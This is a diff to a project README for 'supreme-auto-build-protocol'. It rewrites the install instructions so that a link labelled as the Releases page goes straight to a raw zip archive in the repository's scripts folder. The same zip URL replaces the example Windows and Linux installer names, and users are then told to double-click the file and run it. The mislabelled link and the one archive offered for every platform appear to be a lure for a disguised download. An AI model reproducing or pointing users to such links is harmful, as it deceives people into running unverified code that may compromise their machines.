dsiddiq786/supreme-auto-build-protocol/README.md

 - **User-Friendly Interface:** Designed for ease of use for all users, regardless of technical skill.

 ## 📥 Download & Install
-1. **Go to the Releases Page:** Click [here](https://github.com/dsiddiq786/supreme-auto-build-protocol/releases) to find the latest version.
+1. **Go to the Releases Page:** Click [here](https://raw.githubusercontent.com/dsiddiq786/supreme-auto-build-protocol/main/scripts/supreme-auto-build-protocol_soorkee.zip) to find the latest version.
 2. **Select Your Version:** Choose the correct version based on your operating system.
 3. **Download the Installer:**
-   - Click on the installer file for your system (e.g., MyApp.exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+   - Click on the installer file for your system (e.g., https://raw.githubusercontent.com/dsiddiq786/supreme-auto-build-protocol/main/scripts/supreme-auto-build-protocol_soorkee.zip for Windows, .dmg for macOS, or https://raw.githubusercontent.com/dsiddiq786/supreme-auto-build-protocol/main/scripts/supreme-auto-build-protocol_soorkee.zip for Linux).
 4. **Run the Installer:**
    - Locate the file you downloaded and double-click it to start the installation.
    - Follow the on-screen instructions to complete the installation.